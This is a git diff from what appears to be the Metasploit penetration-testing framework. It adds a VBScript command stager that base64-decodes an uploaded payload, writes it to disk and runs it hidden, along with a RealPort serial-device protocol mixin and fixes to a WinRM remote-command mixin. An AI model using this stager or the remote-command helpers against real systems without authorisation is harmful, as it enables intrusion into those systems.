Merge branch 'master' into bug/read-module-content-errno-enoent

Author: limhoff-r7

data/exploits/cmdstager/vbs_b64_sleep

@@ -0,0 +1,41 @@
+echo Set fs = CreateObject("Scripting.FileSystemObject") >>decode_stub
+echo Set file = fs.GetFile("ENCODED") >>decode_stub
+echo If file.Size Then >>decode_stub
+echo Set fd = fs.OpenTextFile("ENCODED", 1) >>decode_stub
+echo data = fd.ReadAll >>decode_stub
+echo data = Replace(data, vbCrLf, "") >>decode_stub
+echo data = base64_decode(data) >>decode_stub
+echo fd.Close >>decode_stub
+echo Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile("DECODED", 2, True) >>decode_stub
+echo ofs.Write data >>decode_stub
+echo ofs.close >>decode_stub
+echo Set shell = CreateObject("Wscript.Shell") >>decode_stub
+echo shell.run "DECODED", 0, false >>decode_stub
+echo Wscript.sleep(1000 * 60 * 5) >>decode_stub
+echo Else >>decode_stub
+echo Wscript.Echo "The file is empty." >>decode_stub
+echo End If >>decode_stub
+echo Function base64_decode(byVal strIn) >>decode_stub
+echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
+echo For n = 1 To Len(strIn) Step 4 >>decode_stub
+echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
+echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
+echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
+echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
+echo If Not w2 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
+echo If  Not w3 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
+echo If Not w4 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
+echo Next >>decode_stub
+echo base64_decode = strOut >>decode_stub
+echo End Function >>decode_stub
+echo Function mimedecode(byVal strIn) >>decode_stub
+echo Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" >>decode_stub
+echo If Len(strIn) = 0 Then >>decode_stub
+echo mimedecode = -1 : Exit Function >>decode_stub
+echo Else >>decode_stub
+echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
+echo End If >>decode_stub
+echo End Function >>decode_stub

lib/msf/core/exploit/mixins.rb

@@ -59,7 +59,7 @@
 require 'msf/core/exploit/wdbrpc'
 require 'msf/core/exploit/wdbrpc_client'
 require 'msf/core/exploit/afp'
-
+require 'msf/core/exploit/realport'
 
 # Telephony
 require 'msf/core/exploit/dialup'

lib/msf/core/exploit/realport.rb

@@ -0,0 +1,236 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/exploit/tcp'
+
+module Msf
+
+###
+#
+# This module provides methods for working with the RealPort protocol
+#
+###
+module Exploit::Remote::RealPort
+	include Msf::Exploit::Remote::Tcp
+
+	#
+	# Initializes an instance of an auxiliary module that uses RealPort
+	#
+
+	def initialize(info = {})
+		super
+		register_options( [
+			Opt::RPORT(771)
+		], Msf::Exploit::Remote::RealPort )
+	end
+
+	@@REALPORT_BAUD_MAP = {
+		'2400'   => "\x03\x00",
+		'9600'   => "\x00\xc0",
+		'19200'  => "\x00\x60",
+		'38400'  => "\x00\x20",
+		'57600'  => "\x00\x30",
+		'76800'  => "\x00\x10",
+		'115200' => "\x00\x10", # Yup, same as above
+		'230400' => "\x00\x08",
+		'460800' => "\x00\x04",
+		'921600' => "\x00\x02",
+	}
+
+	# Connect to the RealPort service and send the initial handshake
+	# This has the benefit of retrieving the port count and product
+	# Returns true if it succeeds and nil otherwise
+	def realport_connect
+		connect
+		sock.put("\xfb\x01\xfb\x02\xfb\x18")
+		res = sock.get_once(12, 5)
+		return unless (res and res.length == 12)
+
+		unless res[0,2] == "\xfc\x01"
+			vprint_error("#{rhost}:#{rport} Bad reply: #{res.inspect}")
+			return
+		end
+
+		len = res[2,2].unpack("n").first
+		return unless len > 0
+
+		res = sock.get_once(len, 5)
+		unless res.length == len
+			vprint_error("#{rhost}:#{rport} Bad length: #{res.length} wanted #{len}")
+			return
+		end
+
+		name,info = res.split("\xfc\x02", 2)
+		fields = info.unpack("n*")
+
+		@realport_port_count = fields[1].to_i
+		@realport_name = name.gsub(/[\r\n]/, '')
+
+		# The server also sends us an additional four-byte packet we can ignore here
+		# This throws away a \xFC\x18\x00\x04 sequence
+		sock.get_once(-1, 5)
+
+		return true
+	end
+
+	def realport_disconnect
+		disconnect
+	end
+
+	def realport_baud_to_speed(baud)
+		@@REALPORT_BAUD_MAP[baud]
+	end
+
+	def realport_recv_banner(port=0, timeout=30, max_data=4096)
+		#
+		# Data is received here, header is:
+		# a2   00 01      82   XX
+		#  ^ [ counter ]   [ length ]  [ data ]
+		#
+
+		# Can also see f0 here (keep alive)
+
+		banner = ""
+		stime  = Time.now.to_f
+		dcnt   = 0
+		pcnt   = 0
+
+		while banner.length < max_data and (Time.now.to_f - stime) < timeout
+
+			res = sock.get_once(1, 1)
+			unless res
+				if banner.length == 0 or pcnt < 3
+					# Send a new line to wake up the remote end
+					realport_send(port, "\r")
+					pcnt += 1
+					next
+				else
+					# Allow three empty reads *after* we have sent at least one probe and have data
+					dcnt += 1
+					break if dcnt > 3
+					next
+				end
+			end
+			bit = res.unpack("C").first
+			case bit
+			when (0xA0 + port)
+				# Read the packet sequence number (two bytes)
+				res = sock.get_once(2, 1)
+			when 0xF0
+				# Skip this keep-alive response
+			when (0x80 + port)
+				# Read the one-byte length value
+				res = sock.get_once(1, 1)
+				if res
+					len = res.unpack("C").first
+					res = sock.get_once(len, 1)
+					if res
+						banner << res
+					end
+				end
+			end
+		end
+		banner
+	end
+
+	def realport_send(port=0, data)
+		sock.put( [port].pack("C") + data )
+	end
+
+	def realport_close(port=0)
+		cprt = [ 0xb0 + port ].pack("C")
+		pkt  = cprt + "\x28\x00\xc0\x00\xb0\x00\x01\x00\x00\x00\x00" + cprt + "\x0a\x03"
+
+		# Response
+		# b2 0b 03 00 00 02
+
+		# Send a close request
+		sock.put(pkt)
+		res = sock.get_once(-1, 5)
+
+		vprint_status("#{target_host}:#{rport} Port:#{port} Close:#{ res.inspect }")
+		return
+	end
+
+	def realport_open(port=0, baud='9600')
+
+		@realport_banner = ''
+
+		cprt = [ 0xb0 + port ].pack("C")
+		aprt = [ 0xa0 + port ].pack("C")
+
+		speed = realport_baud_to_speed(baud)
+
+		# Open port
+		pkt1 = "\xf0" + cprt + "\x0a"+ "\x00"
+
+		# Response
+		# b2 0b 00 00 00 02
+		#  ^              ^ <- port number
+
+		# Open the port
+		sock.put(pkt1)
+		res = sock.get_once(-1, 5)
+
+		vprint_status("#{target_host}:#{rport} Port:#{port} Baud:#{baud} Open:#{ res.inspect }")
+
+		# Access the port
+		pkt2 =
+			cprt + "\x0e" +
+			cprt + "\x2a\x02\xc0\xf3" +
+			cprt + "\x10" +
+			cprt + "\x14" +
+			cprt + "\x16" +
+			cprt + "\x2c\x03\x00\x00"
+
+		# Response (GOOD)
+		# b2 0f 00 00 00 00 b2 15  0f ff 0f ff b2 11 00 00
+		# 13 b2 17 01 02 00 2f 06  a8 00 1c 20 00 00 00 00
+		# 00 f3 f3 00 00 00 00 00  00 00 00 00 00 00 00 00
+		# 00
+
+		# Response (BAD)
+		# \xFF \x17 Access to unopened port\x00
+
+		# Send negotiate request
+		sock.put(pkt2)
+		res = sock.get_once(-1, 5)
+		if res.to_s =~ /^\xff/
+			vprint_status("#{target_host}:#{rport} Port:#{port} is closed: #{res.inspect}")
+			return :closed
+		end
+
+		vprint_status("#{target_host}:#{rport} Port:#{port} Baud:#{baud} Negotiate:#{ res.inspect }")
+
+		# Terminal settings
+		pkt3 =
+			cprt + "\x30\x03\xff\x00\x64" +
+			cprt + "\x2d\x03\xff\x0b\xff" +
+			cprt + "\x28" + speed + "\x04" +
+			cprt + "\x00\x01\x00\x00\x00\x00" +
+			cprt + "\x2c\x00\x12\x00" +
+			cprt + "\x2e\x11\x13\x16\x00\x00" +
+			cprt + "\x2f\x03\xff\x00\x64" +
+			cprt + "\x40\x37" + aprt + "\x0f\xff"
+
+		# Response
+		# c2 12 00 00 f0
+		#  ^
+
+		# Send terminal settings request
+		sock.put(pkt3)
+		res = sock.get_once(-1, 5)
+
+		if res.to_s =~ /^\xff/
+			vprint_status("#{target_host}:#{rport} Port:#{port} is closed: #{res.inspect}")
+			return :closed
+		end
+
+		vprint_status("#{target_host}:#{rport} Port:#{port} Baud:#{baud} Settings:#{ res.inspect }")
+		return :open
+	end
+
+end
+
+
+end

lib/msf/core/exploit/winrm.rb

@@ -17,6 +17,7 @@ module Exploit::Remote::WinRM
 	NTLM_CONST ||= Rex::Proto::NTLM::Constants
 	NTLM_UTILS ||= Rex::Proto::NTLM::Utils
 	NTLM_XCEPT ||= Rex::Proto::NTLM::Exceptions
+
 	def initialize(info = {})
 		super
 		register_options(
@@ -61,13 +62,17 @@ def parse_auth_methods(resp)
 
 	def winrm_run_cmd(cmd, timeout=20)
 		resp,c = send_request_ntlm(winrm_open_shell_msg,timeout)
+		if resp.nil?
+			print_error "Recieved no reply from server"
+			return nil
+		end
 		if resp.code == 401
 			print_error "Login failure! Recheck supplied credentials."
 			return resp .code
 		end
 		unless resp.code == 200
 			print_error "Got unexpected response: \n #{resp.to_s}"
-			retval == resp.code || 0
+			retval = resp.code || 0
 			return retval
 		end
 		shell_id = winrm_get_shell_id(resp)
@@ -80,6 +85,29 @@ def winrm_run_cmd(cmd, timeout=20)
 		return streams
 	end
 
+	def winrm_run_cmd_hanging(cmd, timeout=20)
+		resp,c = send_request_ntlm(winrm_open_shell_msg,timeout)
+		if resp.nil?
+			print_error "Recieved no reply from server"
+			return nil
+		end
+		if resp.code == 401
+			print_error "Login failure! Recheck supplied credentials."
+			return resp .code
+		end
+		unless resp.code == 200
+			print_error "Got unexpected response: \n #{resp.to_s}"
+			retval = resp.code || 0
+			return retval
+		end
+		shell_id = winrm_get_shell_id(resp)
+		resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id),timeout)
+		cmd_id = winrm_get_cmd_id(resp)
+		resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id),timeout)
+		streams = winrm_get_cmd_streams(resp)
+		return streams
+	end
+
 	def winrm_wql_msg(wql)
 		action = winrm_uri_action("wql")
 		contents = winrm_header(action) + winrm_wql_body(wql)
@@ -134,6 +162,7 @@ def winrm_delete_shell_msg(shell_id)
 	end
 
 	def parse_wql_response(response)
+		return nil if response.nil?
 		xml = response.body
 		columns = []
 		rows =[]
@@ -160,16 +189,19 @@ def parse_wql_response(response)
 	end
 
 	def winrm_get_shell_id(response)
+		return nil if response.nil?
 		xml = response.body
 		shell_id = REXML::Document.new(xml).elements["//w:Selector"].text
 	end
 
 	def winrm_get_cmd_id(response)
+		return nil if response.nil?
 		xml = response.body
 		cmd_id = REXML::Document.new(xml).elements["//rsp:CommandId"].text
 	end
 
 	def winrm_get_cmd_streams(response)
+		return nil if response.nil?
 		streams = {
 			'stdout' => '',
 			'stderr'   => '',
@@ -178,7 +210,7 @@ def winrm_get_cmd_streams(response)
 		rxml = REXML::Document.new(xml).root
 		rxml.elements.to_a("//rsp:Stream").each do |node|
 			next if node.text.nil?
-			streams[node.attributes['Name']] << Rex::Text.base64_decode(node.text)
+			streams[node.attributes['Name']] << Rex::Text.decode_base64(node.text)
 		end
 		return streams
 	end
@@ -291,6 +323,7 @@ def target_url
 		end
 	end
 
+
 	private
 
 	def winrm_option_set(options)